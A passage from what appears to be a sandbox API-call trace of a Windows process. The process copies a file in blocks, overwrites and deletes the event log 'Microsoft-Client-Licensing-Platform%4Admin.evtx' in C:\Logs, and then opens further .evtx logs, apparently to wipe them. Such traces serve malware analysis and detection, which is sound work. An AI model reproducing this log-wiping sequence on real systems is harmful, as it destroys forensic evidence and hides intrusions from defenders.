(in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.910] GetLastError () returned 0x0 [0085.910] SetLastError (dwErrCode=0x0) [0085.910] GetLastError () returned 0x0 [0085.910] SetLastError (dwErrCode=0x0) [0085.910] GetLastError () returned 0x0 [0085.910] SetLastError (dwErrCode=0x0) [0085.910] GetLastError () returned 0x0 [0085.910] SetLastError (dwErrCode=0x0) [0085.910] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.910] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.911] GetLastError () returned 0x0 [0085.911] SetLastError (dwErrCode=0x0) [0085.911] GetLastError () returned 0x0 [0085.911] SetLastError (dwErrCode=0x0) [0085.911] GetLastError () returned 0x0 [0085.911] SetLastError (dwErrCode=0x0) [0085.911] GetLastError () returned 0x0 [0085.911] SetLastError (dwErrCode=0x0) [0085.911] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.911] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.911] GetLastError () returned 0x0 [0085.911] SetLastError (dwErrCode=0x0) [0085.912] GetLastError () returned 0x0 [0085.912] SetLastError (dwErrCode=0x0) [0085.912] GetLastError () returned 0x0 [0085.912] SetLastError (dwErrCode=0x0) [0085.912] GetLastError () returned 0x0 [0085.912] SetLastError (dwErrCode=0x0) [0085.912] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.912] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.912] GetLastError () returned 0x0 [0085.912] SetLastError (dwErrCode=0x0) [0085.912] GetLastError () returned 0x0 [0085.912] SetLastError (dwErrCode=0x0) [0085.913] GetLastError () returned 0x0 [0085.913] SetLastError (dwErrCode=0x0) [0085.913] GetLastError () returned 0x0 [0085.913] SetLastError (dwErrCode=0x0) [0085.913] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.913] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.913] GetLastError () returned 0x0 [0085.913] SetLastError (dwErrCode=0x0) [0085.913] GetLastError () returned 0x0 [0085.913] SetLastError (dwErrCode=0x0) [0085.913] GetLastError () returned 0x0 [0085.913] SetLastError (dwErrCode=0x0) [0085.913] GetLastError () returned 0x0 [0085.914] SetLastError (dwErrCode=0x0) [0085.914] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0085.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0085.914] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0085.914] GetLastError () returned 0x0 [0085.914] SetLastError (dwErrCode=0x0) [0085.914] GetLastError () returned 0x0 [0085.914] SetLastError (dwErrCode=0x0) [0085.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0085.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0085.915] CloseHandle (hObject=0x348) returned 1 [0085.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.917] CloseHandle (hObject=0x424) returned 1 [0085.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.917] AreFileApisANSI () returned 1 [0085.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.917] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.919] GetFileType (hFile=0x424) returned 0x1 [0085.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.919] GetLastError () returned 0xb7 [0085.919] SetLastError (dwErrCode=0xb7) [0085.919] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0085.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.920] CloseHandle (hObject=0x424) returned 1 [0085.920] AreFileApisANSI () returned 1 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.920] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0085.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.922] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x50cf8 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0085.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81e20 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0085.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.923] AreFileApisANSI () returned 1 [0085.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpUsedDefaultChar=0x0) returned 87 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.923] AreFileApisANSI () returned 1 [0085.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0085.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81918 [0085.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0085.924] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.924] GetFileType (hFile=0x424) returned 0x1 [0085.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0085.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0085.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0085.924] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0085.924] CloseHandle (hObject=0x424) returned 1 [0085.925] AreFileApisANSI () returned 1 [0085.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81410 [0085.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81410, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0085.925] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.925] GetFileType (hFile=0x424) returned 0x1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0085.925] CloseHandle (hObject=0x424) returned 1 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x55f20 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x4ebc8 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x4ebc8 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x55f20 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0085.926] AreFileApisANSI () returned 1 [0085.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81d68 [0085.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81d68, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 87 [0085.926] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0085.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.926] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.927] RtlAllocateHeap (HeapHandle=0x20000, 